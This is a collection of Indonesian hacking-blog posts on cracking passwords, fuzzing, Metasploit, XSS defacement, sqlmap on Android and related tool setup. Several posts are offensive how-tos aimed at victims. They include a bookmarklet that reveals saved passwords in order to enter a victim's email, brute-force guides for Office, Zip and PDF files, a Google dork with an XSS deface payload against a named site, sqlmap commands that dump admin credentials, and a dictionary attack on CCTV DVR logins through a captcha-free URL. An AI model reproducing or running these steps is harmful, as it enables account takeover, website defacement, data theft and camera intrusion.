31/05/16

Rahasia Teknik Jebol Password


Exhacking.net - Password merupakan serangkaian karakter,
baik berupa huruf, string, angka dan kombinasi,
dari beberapa hal tersebut untuk melindungi dokumen penting  atau sesuatu yang berharga
untuk memastikan seseorang yang mengakses sistem tersebut adalah
PEMILIK YANG SEBENARNYA.

Password bersifat SANGAT RAHASIA dan TERTUTUP UNTUK ORANG LAIN,
sehingga fatal akibatnya jika informasi yang kita miliki diketahui oleh orang lain.
Bayangkan Jika Password Email Anda Jebol ?
Maka seluruh data-data anda pada email anda tersebut akan dapat di ketahui,
padahal email adalah salah satu hal yang bersifat pribadi.
Itu contoh yang termudah,
bagaimana jika Password Account Internet Banking anda yang di Jebol ?
Wah, bisa-bisa seluruh uang anda di Account tersebut bisa dikuras habis oleh sang Maling ..... !!!!!
Bahaya sekali, Bukan ?

Pada bagian ini, saya TIDAK BERTUJUAN Untuk MENDIDIK Anda Untuk
Menjadi Maling / Penjahat, tetapi Ingin Membuka Wawasan Kepada Anda :
BAHWA JANGAN PERNAH MERASA AMAN
walaupun anda sudah MEMPROTEKSI MILIK ANDA YANG BERHARGA
dengan PASSWORD !!!
Sebab Bagaimanapun sistem PASSWORD di buat oleh MANUSIA,
dan dapat di jebol pula oleh MANUSIA ... !!!
kalo kata Benjamin cs "No System is Safe"

Baiklah , mari kita pelajari satu persatu
Tools / Alat untuk Menjebol Password.
Cara Termudah Menjebol Password adalah dengan menggunakan “ Tools/Alat “.

Tips Membuat Password yang 99,9 % Aman
Sebelum saya membahas tehnik menjebol password, ada baiknya saya memberitahu anda TIPS Cara Membuat Password yang 99,9 % Aman.
Lho..... Kenapa tidak 100 % Aman ?
Karena Memang SAYA TIDAK BERANI MENJAMIN Bahwa Tips Berikut ini akan Menjamin Keamanan Password Anda tidak akan bisa di jebol.
Mengapa ?
KARENA YANG NAMANYA MALING Tuh akan jauh lebih pintar daripada
pembuat alat keamanan.
Buktinya Mobil yang telah dilengkapi ALARM dan DITARUH di GARASI pun
masih bisa di curi Maling,
Bahkan saya juga pernah mendengar ada Mobil Yang di parkir di sebuah Mall tiba-tiba
raib entah kemana, padahal diparkir di dekat pos keamanan ....
Aneh bin ajaib bukan ?
Karena itu jangan jadikan TIPS BERIKUT INI sebagai SEBUAH KEPASTIAN, tapi jadikan TIPS Berikut ini akan MEMPERSULIT, ingat,
MEMPERSULIT MALING MENJEBOL PASSWORD ANDA.

Baiklah, berikut ini tips nya :
1. Buatlah password yang TIDAK BERHUBUNGAN DENGAN DIRI ANDA,
misal nama orangtua, nama anak, kekasih, tanggal lahir, tanggal jadian, hari
perkawinan, no.ktp, dan sebagainya.
Terutama bagi anak SMA yang
mengunakan FRIENDSTER, Jangan gunakan data apapun yang kalian INPUT
di FRIENDSTER Kalian sebagai PASSWORD.
Hal ini bagaikan anda memberikan Kunci Motor / Mobil secara gratis kepada Maling, hehehe...
2. Buatlah jumlah karakter yang panjang, lebih baik lebih dari 15 karakter
3. Jangan gunakan password yang bersumber dari Kamus
4. Hati-hati apabila anda membuat password dari Komputer Publik, misalnya di Warnet, Kantor, dsb, karena bisa saja ada program Keylogger (Pembaca dan penyimpan setiap ketukan Keyboard anda)
5. Buatlah password dengan karakter unik, di luar angka dan huruf, misal &#*^{}
6. Jangan menyimpan password dalam Handphone anda, karena bila HP Anda di curi orang, maka lenyaplah semua data dan barang berharga anda.

Demikian Tips dari saya, semoga Bermanfaat.

Mari kita lanjutkan,
Rahasia Menjebol Password YM
Siapa yang tidak mengenal Yahoo Messenger ?
Yahoo Messenger adalah salah satu aplikasi atau service yang diberikan oleh Yahoo agar kita bisa chatting dengan siapaun di seluruh penjuru dunia, baik via tulisan maupun voice.
Anda harus memiliki email Yahoo terlebih dahulu untuk memanfaatkan service ini.
Biasanya dalam form.login YM, di bawahnya ada tulisan REMEMBER MY ID dan PASSWORD, yang SECARA TIDAK SENGAJA TERCENTANG, sehingga ketika Si Pemilik ID logout, data Login dan passwordnya masih tersimpan, walalupun data
passwordnya MASIH BERBENTUK ASTERIX / BINTANG ( ****** )

Nah data yang masih berbentuk Asterix ini bisa di jebol dengan JavaScript atau bantuan dari tools yang bernama
Snadsboy’s Revelation V2.
Mungkin sampai di sini ada sebagian anda yang bertanya.
Ngapain sich susah-susah menjebol Password Yahoo Messenger ?
Nah di sinilah kesalahan anda.
Tujuan kita menjebol password Asterix adalah agar KITA BISA MENGAKSES
EMAIL YAHOO Korban, Bukan YAHOO MESSENGERNYA
Jadi bagaimana kita bisa mengakses Email Yahoo Korban, jika password yang masih berbentuk Asterix belum kita pecahkan ?

Ok, mari kita lanjutkan ...
Memecahkan password Asterix dengan JavaScript,
Copy code di bawah ini lalu simpan di Bookmark dengan PWD
javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k<w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' + g + ' forms');}function z(f){var b=false;for(var i=0;i<f.length;i++) {var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s='';if (ej.type=='password'){s=ej.value;if (s!=''){prompt('Password found ', s)}else{alert('Password is blank')}return true;}}
Setelah itu silahkan di Klik PWD tepat di halaman login YM tadi, maka akan muncul popup yang berisi password korban yang tadinya masih Asterix (*****)

Begini cara menjalankan aplikasi Snadsboy’s Revelation V2 :
1. Instal terlebih dahulu aplikasi ini, http://www.snadboy.com
pada komputer anda
2. Jalankan program ini dengan memilih menu START -> ALL PROGRAMS -
> SNADBOY’S REVELATION V2 -> REVELATION
3. Anda akan melihat TANDA PLUS DALAM LINGKARAN Software ini.
4. Aktifkan Snadsboy’s Revelation V2, klik tanda plus dalam lingkaran
kemudian DRAG ke AREA PASSWORD yang masih berbentuk Asterix
di YM Korban, TAHAN BEBERAPA SAAT, sehingga password akan
di tampilkan pada TEXTBOX berbentuk TEXT.
5. Sekarang anda bisa membaca password Yahoo Korban,

SANGAT MUDAH BUKAN ?

Rahasia Menjebol Password Winzip
Winzip adalah alat yang digunakan untuk mengkompresi file yang berukuran
besar sehingga bisa dikurangi kapasitasnya,
biasanya file akan berakhiran DOT ZIP (.zip)
Winzip juga memberikan fasilitas proteksi password apabila data pada file
tersebut dianggap penting dan sangat rahasia.

Tapi jangan kuatir.
Karena anda berkenan membaca artikel  ini, maka saya akan
ajarkan TEHNIK MENJEBOL File yang diproteksi PASSWORD WINZIP.
1. Bukalah http://www.astonsoft.com
2. Downloadlah file ZIP PASSWORD FINDER , EKSTRAKLAH TERLEBIH
DAHULU
3. Setelah di ekstrak, installah di komputer
4. Lalu jalankan (RUN) Program tersebut
5. Klik tombol OPEN FILE
6. Pilih file ZIP yang akan di jebol passwordnya,
kemudian Klik OPEN kembali
7. Setelah filenya terpilih, pada OPSI CHAR TYPE PROPERTY,
klik ALPHA (lower) (a-z), lalu untuk MAX PASSWORD LENGTH : 5
8. Lalu klik tombol  START
9. Klik Tombol DISPLAY ON
10. Proses akan memakan waktu yang cukup lama kira-kira 25 menit
11. Jreng .. Jreng .... setelah bosan menunggu,
akhirnya KELUARLAH PASSWORD ZIP tersebut !!!

Rahasia Menjebol Password Microsoft Word
1. Bukalah : http://www.freewordexcelpassword.com
2. Download programnya
3. Instal programnya
4. Klik tombol NEXT, lalu KLIK TAB SELECT FILE -> Lalu klik tombol
Select a file
5. Pada kotak dialog SELECT WORD or EXCEL FILE, pilih WORD files
(*.doc) pada OPSI “File of type” di bagian paling bawah
6. Lalu Klik OPEN
7. Setelah anda menentukan file WORD yang akan dibuka, selanjutnya Anda
Klik Tab “BRUTE FORCE RECOVERY”
8. Pada “BRUTE FORCE RECOVERY” anda harus menentukan character yang mungkin diinputkan,
isilah dengan a-z, A-Z, 0-9, special character
9. Lalu inputkan From (length)nya misal pilihlah 1 to 9
10. Klik GO / NEXT
11. Nah, tinggal ditunggu deh, prosesnya juga cukup lama, anda tinggal saja dulu
sambil nonton tv atau lihat website lainnya di Internet ....
12. Jika proses ini berhasil, maka akan muncul KOTAK INFO :
Excel File Password Recovery.
Lho kok Excel File password, saya kan nyarinya Word
File Pasword ? Tenang. Kotak Info ini memamng namanya Excel File
Password Recovery kok, tapi tetep itu adalah word file password isinya.
Ok, SANGAT MUDAH BUKAN ?

Rahasia Menjebol Password Microsoft Excel
1. Bukalah : http://www.passwordrecoverytools.com
2. Installah program Accent EXCEL Password Recovery (AEXPR) terlebih
dahulu di komputer anda
3. Klik OPEN a Document
4. Pada kotak dialog , carilah File Excel yang di proteksi password, lalu KLIK
OPEN
5. Jika sudah Klik Lambang START ?
6. Selanjutnya akan tampil kotak dialog Accent Password Recovery Wizard,
anda pilih Opsi kedua yaitu :
No (Brute-force attack will be performed)
7. Klik Next
8. Lalu pilih Opsi Create Custom Charset
9. Klik Next
10. Lalu anda pilih No (Simple brute force attack will be performed)
11. Klik Next
12. Lalu beri tanda checklist pada pilihan Users
13. Klik Next
14. Anda akan tiba di Penentuan Length / Panjang Password, aturlah : Password Length : 1 dan start search with : a
15. Klik Next, lalu KLIK RUN SEARCH
16. Wuiihhh, setelah langkah yang panjang dan melelahkan ini, anda pun harus di wajibkan menunggu cukup lama
17. Akhirnya terbukalah password yang didamba-dambaka.

Rahasia Menjebol Password Microsoft Power Point
1. Bukalah : http://www.intelore.com/password-recovery.php
2. Installah program Password Recovery for MS. Power Point
3. Pilih File -> Open
4. Pilih file yang akan dijebol
5. Klik Open
6. Klik Tombol Next
7. Berikutnya anda akan menemukan kotak Password Information , attack
methods, PILIH : I do not know anything about the password
8. Klik Next
9. Berikutnya anda akan menemukan kotak Select Main Attack Profile ,
PILIH :
Automatic Attack Profile (recommended)
10. Klik Next
11. Klik Finish
12. Jika anda mengira saya akan menuliskan :
“Silahkan anda menonton tv,
sebab di perlukan waktu yang lama untuk menunggu “ ,
hehehe anda salah besar, karena kali ini untuk menjebol password
MS POWER POINT anda
hanya menunggu SEBENTAR SAJA KOK, huhehehe
13. Akhirnya Password pujaan hati pun muncul tanpa malu-malu :D

Rahasia Menjebol Password PDF
Siapa yang tidak mengenal PDF ?
Anda belum kenal PDF ? Kenalan dulu dunk ... hahahaa
Kalau anda penggemar E-Book, maka anda sudah pasti tahu apa PDF itu ?
Ok langsung saja ya, sebab masih bayak yang perlu saya bahas dibelakang
1. Bukalah : http://www.elcomsoft.com/apdfpr.html
2. Instal program Advanced PDF Password Recovery
3. Jalankan di komputer anda
4. Pada TAB RANGE berilah tanda checklist pada pilihan ALL PRINTABLE
5. Lalu pada Tab Length isilah : Minimal
Password Length : 1 character(s) dan
Maximal password length : 4 character(s)
6. Pilih type of attack: Brute-force
7. Pilih FILE -> Open File
8. Pilihlah File yang diproteksi password, lalu klik tombol OPEN
9. Lalu Klik START RECOVERY
10. Tunggulah sebentar, maka password pun akan muncul dari tempat
persembunyiannya, hwhehehe... Very Happy

Nah, sangat mudah bukan ?
Kini tidak ada lagi file-file yang aman baik itu MS
WORD, EXCEL, POWER POINT Ataupun PDF jika jatuh ke tangan anda.
Malah jika anda sudah mahir, anda bisa buka jasa PENJEBOLAN PASSWORD
PENTING Very Happy

Sekian artikel hari ini, Semuga bermanfaat ya :)

Exhacking.net - Password merupakan serangkaian karakter, baik berupa huruf, string, angka dan kombinasi, dari beberapa hal tersebut unt...

30/05/16

Melakukan Fuzz Testing Dengan Kali-Linux

Exhacking.net - Pada saat membuat program, developer mengharapkan pengguna memasukkan input sesuai dengan yang seharusnya.
Pada kenyataannya, pengguna (terutama yang iseng) mungkin saja memberikan input yang tidak di harapkan.
Lalu, apa yang akan terjadi dengan program bila pengguna memberikan input yang tidak di harapkan?  

Fuzz testing adalah pengujian yang di lakukan untuk menjawab pertanyaan tersebut.  
Fuzz testing adalah jenis pengujian black box di mana penguji memberikan berbagai jenis input yang tidak valid pada program.
Kali Linux mem-bundle beberapa tools untuk keperluan fuzz testing yang dapat di temukan di menu Kali Linux > Vulnerability Analysis > Fuzzing
Tools.

Saya akan mencoba beberapa tools tersebut.
Tool pertama yang saya temukan, BED, adalah sebuah script Perl yang di pakai untuk menguji penanganan protokol.  
BED mendukung protokol seperti FTP, SMTP, POP, HTTP, IRC, IMAP, PJL, LPD, FINGER, SOCKS4, dan SOCKS5.
Dengan demikian, BED tidak dipakai untuk menguji program seperti aplikasi web, melainkan menguji infrastruktur seperti web server, mail server, FTP server dan sebagainya.  

BED akan berhenti bila berhasil membuat server yang diuji menjadi down atau crash.
Sebagai contoh, saya ingin menguji seberapa handal FTP server di router yang saya pakai.
Karena kemampuan pemrosesan di router ekonomis yang terbatas dan jarang sekali upgrade firmware, saya pantas merasa ragu dengan keamanannya.
Oleh sebab itu, saya dapat melakukan pengujian dengan perintah seperti berikut ini:
# bed -s FTP -u admin -v password -t 192.168.1.1
BED 0.5 by mjm ( www.codito.de ) &amp; eric ( www.snake-basket.de )
+ Buffer overflow testing:
+ Formatstring testing:
* Normal tests
+ Buffer overflow testing:
+ Formatstring testing:
+ Unicode testing:
+ random number testing:
+ testing misc strings 1:
+ testing misc strings 2:
+ testing misc strings 3:
+ testing misc strings 4:
+ testing misc strings 5:


Script BED akan menguji dengan memakai input berupa overflow string
("A" x 1023 atau "\\" x 200),
format string (seperti %s%s%s%s atau %.2048d),
unicode string (seperti "x99" x 512), large number (seperti -268435455), dan misc string (seperti "/" atau "\r\n").

Khusus pada FTP, ia juga akan menguji apakah directory traversal dengan input seperti "/././.." di mungkinkan atau tidak.
Tool lainnya yang berada dalam kategori ini adalah powerfuzzer.
Tool berbasis GUI ini dapat dipakai untuk menguji aplikasi web.

Sebagai contoh, saya akan melakukan pengujian pada router saya yang memiliki halaman administrasi dalam bentuk aplikasi web.
Saya dapat memberikan perintah berikut ini untuk menjalankan powerfuzzer:
# powerfuzzer
Saya mengisi bagian credentials dengan nama user dan password router. Setelah itu, saya mengisi Target URL dengan lokasi router yaitu di http://192.168.1.1 dan men-klik tombol Scan.  

powerfuzzer akan bekerja dan menampilkan hasil pemeriksaan setelah selesai. powerpuzzer pada dasarnya adalah script Python yang bekerja mengisi parameter yang di pakai pada parameter pada request GET dan POST dengan nilai yang tidak valid seperti lokasi file (misalnya /etc/passwd atau http://www.google.com/), script (misalnya "a;env", "a);env", dan "/e"),
injeksi (dengan payload berupa "\xbf'\"("), javascript (untuk memeriksa XSS), dan string CRLF seperti "http://www.google.com\r\nPowerfuzzer: v1 BETA".

Menariknya, hasil pengujian menunjukkan terdapat celah keamanan XSS pada web administrasi router saya.
Bukan hanya itu saja! Dengan mengirim payload tertentu menggunakan method POST pada URL tersebut, router akan crash dan di-restart kembali.

Selain memakai tools yang ada di kategori Fuzzing Tools, bila melakukan fuzz testing pada aplikasi web, saya dapat menggunakan tool yang ada di menu Kali Linux > Web Applications > Web Application Fuzzers.
Disini saya dapat menggunakan tool yang lebih ‘user-friendly’ dan berbasis GUI seperti Burp dan Zed Attack Proxy (ZAP).

Fuzz testing pada Burp dilakukan dengan memilih tab Intruder dan memilih salah satu jenis payload yang diujikan seperti Illegal Unicode.
Pada ZAP, saya dapat memilih tab Active Scan untuk mencari celah keamanan pada URL yang telah diperoleh oleh spider.
ZAP akan melakukan beberapa pemeriksaan, termasuk diantaranya adalah Cross Site Scripting (XSS), SQL Injection dan CRLF injection.

Untuk melakukan fuzz testing pada URL tunggal di ZAP, saya perlu memilih sebuah parameter atau header di bagian Request, kemudian men-klik kanan dan memilih Fuzz….
Pada dialog yang muncul, saya dapat memilih fuzzer yang akan dipakai, seperti jbrofuzz/Buffer Overflows, jbrofuzz/Format String Errors, jbrofuzz/Integer Overflows, jbrofuzz/SQL Injection, dan sebagainya.

Exhacking.net - Pada saat membuat program, developer mengharapkan pengguna memasukkan input sesuai dengan yang seharusnya. Pada kenyataann...

Memakai Metasploit Framework di Kali-Linux

Exhacking.net - Metasploit Framework merupakan framework yang paling umum dipakai untuk menguji sebuah exploit
Mengapa di butuhkan framework dalam membuat kode program exploit? Biasanya kode program exploit memiliki operasi yang umum seperti mengirim request HTTP, membuat server web sebagai pancingan bagi korban, dan sebagainya.

Dengan adanya sebuah framework yang universal dan lengkap, tugas membuat kode program exploit menjadi lebih mudah.
Selain itu, hal ini juga mempermudah pihak lain untuk menguji exploit yang telah di tulis dengan mudah.

Berdasarkan situs resminya, Metasploit terdiri atas beberapa versi, yaitu Framework, Community, Express, dan Pro.
Seluruh versi selain versi Framework memiliki interface berbasis web yang dapat di pakai dengan mudah.

Dari seluruh versi yang ada, hanya versi Framework dan Community yang gratis.
Selain itu, pengguna versi Community perlu melakukan registrasi terlebih dahulu.
Pada artikel ini, saya akan memakai versi Framework yang hanya menyediakan CLI (tampilan berbasis teks).

Untuk menjalankannya, saya memilih menu Kali Linux > Exploitation Tools > Metasploit > metasploit framework.
Modul pada Metasploit dikategorikan menjadi encoder, nop generator, exploit, payload, dan auxiliary.

Modul exploit mewakili sebuah celah keamanan yang akan di ujikan.
Celah keamanan ini memungkinkan penyerang untuk mengakses sistem yang di serang.
Untuk itu di butuhkan modul payload yang akan dikerjakan bila modul exploit berhasil menjalankan tugasnya,
biasanya berupa shell.

Modul auxiliary adalah sesuatu yang mirip seperti exploit tetapi tidak memiliki payload sehingga penyerang tidak dapat bermain-main dengan sistem sasaran secara leluasa (setidaknya untuk saat tersebut.
Contohnya adalah operasi scanning, serangan yang hanya melumpuhkan server, membuat server palsu atau melakukan password cracking secara offline.

Modul nop generator dan encoder di pakai untuk mengelabui sistem pertahanan milik sasaran (seperti antivirus dan IDS/IPS) sehingga sasaran tidak mengetahui bahwa dirinya sedang di serang.

Untuk melihat seluruh modul yang ada, saya dapat memberikan perintah seperti:
msf > show all
Untuk melihat modul untuk kategori tertentu, saya dapat memberikan perintah seperti:
msf > show exploits
msf > show auxiliary
msf > show payloads
msf > show encoders
msf > show nops
Sebagai latihan, saya akan mencoba mencari IP yang mewakili CCTV DVR di jaringan saya.
Saat ini, sudah banyak CCTV DVR yang dapat diakses melalui web.
Seberapa besar tingkat keamanan yang di berikan oleh perangkat CCTV DVR yang langsung terkoneksi ke internet?
Untuk mencari tahu IP apa saja yang mewakili CCTV DVR, saya perlu menggunakan modul auxiliary
 scanner/misc/cctv_dvr_login
dengan memberikan perintah berikut ini:
msf > use scanner/misc/cctv_dvr_login
Berikutnya, saya perlu melakukan konfigurasi untuk modul tersebut.
Untuk melihat apa saja yang dapat di atur,
saya memberikan perintah berikut ini:
msf auxiliary(cctv_dvr_login) > show options
Nilai RHOSTS saat ini masih kosong.
Saya perlu mengisinya dengan nilai IP yang perlu di-scan.
Sebagai contoh, bila saya ingin men-scan IP pada range 192.168.1.0 hingga 192.168.1.255,
maka saya dapat memberikan perintah berikut ini:
msf auxiliary(cctv_dvr_login) > set rhosts 192.168.1.0/24
Karena modul auxiliary tidak membutuhkan payload,
saya dapat langsung menjalankannya dengan memberikan perintah:
msf auxiliary(cctv_dvr_login) > exploit
Metasploit akan melakukan proses scanning..
Hasilnya adalah tidak ada IP CCTV yang ditemukan!!
Hal ini karena perangkat CCTV DVR yang populer di wilayah geografi saya berbeda dengan yang di temui si pembuat modul.

Saya melihat bahwa perangkat CCTV DVR disini sering kali men-ekspos port 554 untuk keperluan streaming.
Oleh sebab itu, saya dapat memeriksa apakah sebuah IP membuka port 554 dengan memakai modul auxiliary scanner/portscan/tcp memberikan perintah berikut ini:
msf auxiliary(cctv_dvr_login) > back
msf > use scanner/portscan/tcp
msf auxiliary(tcp) > show options
msf auxiliary(tcp) > set ports 554
msf auxiliary(tcp) > set rhosts 192.168.1.0/24
msf auxiliary(tcp) > set threads 5
msf auxiliary(tcp) > exploit
Metasploit pun melaporkan IP dengan port TCP 554 yang terbuka. Kemungkinan besar IP tersebut adalah IP khusus untuk CCTV DVR.
Saya sudah menemukan IP target.

Langkah berikutnya adalah menebak password yang di pakai untuk login. Karena proses authentication biasanya dilakukan dengan menggunakan standar dari HTTP, maka saya dapat menggunakan modul auxiliary scanner/http/http_login seperti berikut ini:
msf auxiliary(tcp) > back
msf > use scanner/http/http_login
msf auxiliary(http_login) > show options 
Sebuah merk CCTV DVR populer di wilayah geografi saya memiliki halaman administrasi berbasis web yang di lengkapi dengan proses login dan captcha.

Sekilas terlihat bahwa proses bruteforce atau dictionary attack adalah hal yang tidak mungkin, bukan?
Tapi masalahnya CCTV DVR tersebut juga mempublikasi situs web khusus untuk perangkat mobile yang dapat diakses tanpa captcha.

Contoh URL yang dapat di-brute force tanpa harus melalui captcha adalah /cgi-bin/guest/Video.cgi?media=JPEG&channel=1.
Oleh sebab itu, saya segera melakukan pengaturan seperti berikut ini:
msf auxiliary(http_login) > set auth_uri /cgi-bin/guest/Video.cgi?media=JPEG&channel=1
msf auxiliary(http_login) > set blank_passwords false
msf auxiliary(http_login) > set rhosts 192.168.1.135,200,300
msf auxiliary(http_login) > set stop_on_success true
msf auxiliary(http_login) > exploit
Pada perintah di atas, Metasploit akan mencoba melakukan dictionary attack untuk HTTP authentication pada IP 192.168.1.135, 192.168.1.200, dan 192.168.1.300.

Bila berhasil, maka saya dapat dengan mudah login ke IP tersebut melalui browser untuk melihat live streaming maupun hasil rekaman CCTV.
Pada percobaan ini, saya menemukan cukup banyak CCTV DVR yang dapat diakses dengan mudah karena pengguna memakai password default yang mudah di tebak.

Agar proses pencarian menjadi lebih mudah, saya dapat membuat sebuah modul baru dalam bahasa pemograman Ruby yang dapat mencari IP milik beberapa brand CCTV DVR yang populer
(contoh di atas hanya berdasarkan pada perilaku sebuah brand terkenal) dan berusaha untuk login melalui web.
 Dengan demikian, saya tidak perlu mengulangi langkah di atas lagi setiap kali ingin melakukan pencarian.
Ini adalah kelebihan Metasploit sebagai sebuah framework.

Kesimpulannya: Produsen CCTV DVR harus meningkatkan keamanan produknya.
Sudah bukan rahasia lagi bila banyak firmware (istilah untuk program yang berjalan di hardware/elektronik) yang di tulis dengan kualitas rendah.
Bug dan kesalahan ketik dapat di jumpai dengan mudah pada firmware yang beredar di pasaran.

Masalahnya, pengguna akan jarang melakukan update firmware bila ada perbaikan bug (apa ini strategi pasar agar mereka membeli produk baru yang lebih aman?

Pihak yang melakukan instalasi CCTV juga sebaiknya mengedukasi pengguna agar menggunakan password yang lebih aman dan lebih sulit di tebak.
Selain itu, mengakses sistem milik orang lain tanpa seizin pemiliknya adalah perbuatan ilegal (mungkin pengecualiannya adalah bila segera memberi tahu pihak terkait atas celah keamanan yang dimilikinya).

Exhacking.net - Metasploit Framework merupakan framework yang paling umum dipakai untuk menguji sebuah exploit .  Mengapa di butuhkan fram...

29/05/16

Cara Deface Web Dengan XSS Vulnerability

Exhacking.net - XSS merupakan kependekan yang digunakan untuk istilah cross site scripting.
XSS merupakan salah satu jenis serangan injeksi code (code injection attack).
XSS di lakukan oleh penyerang dengan cara memasukkan kode
atau client script code lainnya ke suatu situs.

Serangan ini akan seolah - olah datang dari situs tersebut.
Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan
di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.
Dan kali ini ane akan tunjukkan cara deface web menggunakan XSS.
Mudah kok.

1. Ketik dork berikut ke google inurl:"/showcatrows.php?"

2. Akan banyak web yang muncul, silahkan anda pilih salah satu untuk
di eksekusi.

3. Jika sudah masuk ke webnya, coba perhatikan URLnya. 
Pasti berakhiran angka kan? Nah dibelakang angka itulah kita masukkan kode html kita.
Contoh : 
http://www.paypalshop.org/showcatrows.php?CategoryID=5\"><h1>Hacked+by+Haris32</h1> 

4. Jadi dibelakang url tersebut masukkan kode seperti ini
\"><h1>Hacked+by+Haris32</h1>

5. Selesai, maka text yang ada di kode html anda akan muncul di web tersebut.
Silahkan Lihat DEMO

Mudah bukan?

Exhacking.net - XSS merupakan kependekan yang digunakan untuk istilah cross site scripting . XSS merupakan salah satu jenis serangan injek...

28/05/16

Cara Install / Menjalankan SQLMAP di Android

Exhacking.net - Holla brother setelah selesai menulis artikel Install Botbrew Manual di Android
Sekarang ane akan share Cara Install / Menjalankan SQLMAP di Android
supaya lengkap Tools hackngnya :D

Pasti sudah pada tahu Apa itu SQLMAP? yups SQLMAP Biasanya di pakai oleh para Carder dan Defacer untuk melakukan serangan hacking terhadap website yang rentan SQLi,
SQLMAP biasanya di install di PC/Leptop tapi sekarang ane akan share  tutorialnya seperti judul di atas.

Silahkan di simak om om sekalan :D

Bahan :
-Botbrew silahkan baca di artikel sebelumnya di sini
-Terminal Emulator download di sini
-SQLMAP download di sini resminya aja biar varokah :D

Tutorial :
Ekstrat sqlmapnya terserah dimana
di sdcard juga boleh -_-
Jika sudah buka Terminal Emulator
Ketik su Enter
Ketik Botbrew Enter
Ketik cd sdcard/foldersqlmapnya/ Enter
Ketik python sqlmap.py -u http://webvulnnya.com/index.php?id=0 --dbs Enter

Nah intinya sudah bisa jalankan
Sekarang tinggal berkreasi sendiri saja
Dan pasti sudah pada ngerti command-command sqlmap nya :)

Beberapa fungsi command sqlmap standar komunitas
-Misal: python sqlmap.py -u http://webvulnnya.com/index.php?id=0 --dbs
> "-u" adalah "URL" target kita yang akan di eksekusi oleh sqlmap
> "--dbs" di atas adalah sqlmap akan berusaha mencari database dari web target kita tadi.

-Misal: python sqlmap.py -u http://webvulnnya.com/index.php?id=0 -D database --tables
> "-D" adalah database
> "--tables" adalah untuk mendapatkan tables dari database

-Misal: python sqlmap.py -u http://webvulnnya.com/index.php?id=0 -D database -T admin --columns
> "-T" adalah nama table
> "--columns"  adalah melihat columns di table

-Misal: python sqlmap.py -u http://webvulnnya.com/index.php?id=0 -D database -T admin -C user,pass --dump
> "-C " adalah nama column
> "--dump"  adalah  melihat data di column

Itulah command standar komunitasnya :v
Untuk command lainnya kepribadian privasi masing-masing :p
Baca bismillah sebelum ngedump :v

Ok sekian dan terima kasih

Exhacking.net - Holla brother setelah selesai menulis artikel Install Botbrew Manual di Android Sekarang ane akan share Cara Install / Menj...

Install Botbrew Manual di Android

Exhacking.net -  Kali ini ane mau share cara install botbrew manual
Kenapa secara manual?
Waktu itu ane mencoba install otomatis secara online tidak bisa lagi padahal sudah instal bussybox juga hmm...,dan temen ane mencoba mengalami problem yang sama seperti ane sendiri .

Dan pada akhirnya ane mencoba meminta file yang sudah  terinstall botbrew sama temen ane ,sebut saja mr X zu :D
ane mencoba otak atik smpai pada akhirnya bisa ,waktu itu sih ane cuma terfokus sama pythonnya ,jadi cuma memikirkan pythonnya supaya berjalan ckck :D
Ane sangat berterima kasih kepada mr X zu yang sudah memberi file BBnya ^_^
Akhir hasil pun tidak sia-sia ,ane jadi inget kata-kata ini 'DIMANA ADA KEMAUAN DISITU PASTI ADA JALAN' :)

Ok langsung saja
CEKIDOT
Fitur botbrew:
-nmap
-gcc
-tcpdump
-pyhton
-dll


Alat yang diperlukan:
-File Botbrew di sini
-Root Explor di sini
-Terminal Emulator di sini
-BussyBox pro di sini
-Yang terpenting Android+Rokok+Kopi :v
Tutorial:
-Install semua
-Install bussybox sperti ini :)

-Ekstrat Semua yang ada di zip botbrew itu
-Buka RootExplor
-Buat folder botbrew di root/data/
-Pindahkan semua hasil ektrat tadi ke situ
-Ubah permission init.sh yang di folder botbrew menjadi 777

-Buka lagi folder bin yang ada di folder botbrew ,Ubah permission file botbrew dan python nya menjadi 777


-Dan copy file botbrew nya ,Paste ke root/system/xbin/

Ekskusi dah di Terminal Emulator
-Buka Terminal Emulator
Kalau Testing python
Ketik su Enter
Ketik botbrew Enter
Ketik python Enter
Dan begini hasinya = It's Work :D


Jika sperti ini ,berarti permission belum 777 ,jadi ubahlah sendri yang di folder bin :)
Sekian tutoial Install Botbrew manualnya :)

Exhacking.net -  Kali ini ane mau share cara install botbrew manual Kenapa secara manual? Waktu itu ane mencoba install otomatis secara o...

27/05/16

Cara Membuat Kali Linux Live USB

Exhacking.net - Sekarang semuanya serba mudah, termasuk sistem operasi yang bisa di simpan dalam USB dan bisa di bawa kemana- mana dalam saku, termasuk Kali Linux.
Jika anda adalah seorang yang gemar melakukan penetration testing, atau sedang dalam proses belajar,
maka memiliki Kali Linux Live USB adalah satu hal yang bisa di katakan harus.
Cara membuat Kali Linux Live USB adalah sebagai berikut:

1. Siapkan USB Flash Disk berkapasitas minimal 8 GB dan berformat FAT32.

2. Download Unetbootin  dan file ISO Kali Linux.

3. Buka Unetbootin dan klik icon tiga dot pada bagian "Disk Image" untuk memilih file ISO Kali Linux.



4. Pilih File ISO Kali Linux dan Klik "Open".


5. Masukkan nilai "4096" pada "Space used to preserve files across reboot".


6. Pastikan USB Flash Disk terdeteksi,
dalam hal ini terdeteksi Drive G:\. Selanjutnya klik "OK" untuk memulai pembuatan Kali Linux Live USB.



7. Tunggu prosesnya sampai selesai.
Setelah selesai, anda bisa klik "Reboot Now" dan selanjutnya memilih boot dari USB untuk menggunakan Kali Linux Live USB.



Cara lain yang bisa anda gunakan untuk membuat Kali Linux Live USB adalah dengan menggunakan Linux Live USB Creator.

Cara penggunaannya juga mudah, tinggal pilih USB yang anda ingin gunakan pada "Step 1", pilih file ISO Kali Linux.
pada "Step 2", dan setelah lampu menunjukkan semua berwarna hijau,
klik icon petir
pada "Step 5" untuk memulai proses pembuatan Kali Linux Live USB.


Exhacking.net - Sekarang semuanya serba mudah, termasuk sistem operasi yang bisa di simpan dalam USB dan bisa di bawa kemana- mana dalam sa...

Menggali Informasi Website Menggunakan Maltego di Kali-Linux

Exhacking.net - Definisi Open Source Intelligence (OSINT) berdasarkan departemen pertahanan (DoD) Amerika adalah inteligensi yang diperoleh dari informasi yang tersedia untuk publik yang dikumpulkan, diolah dan disebarkan kepada pihak tertentu untuk keperluan intelijen tertentu.

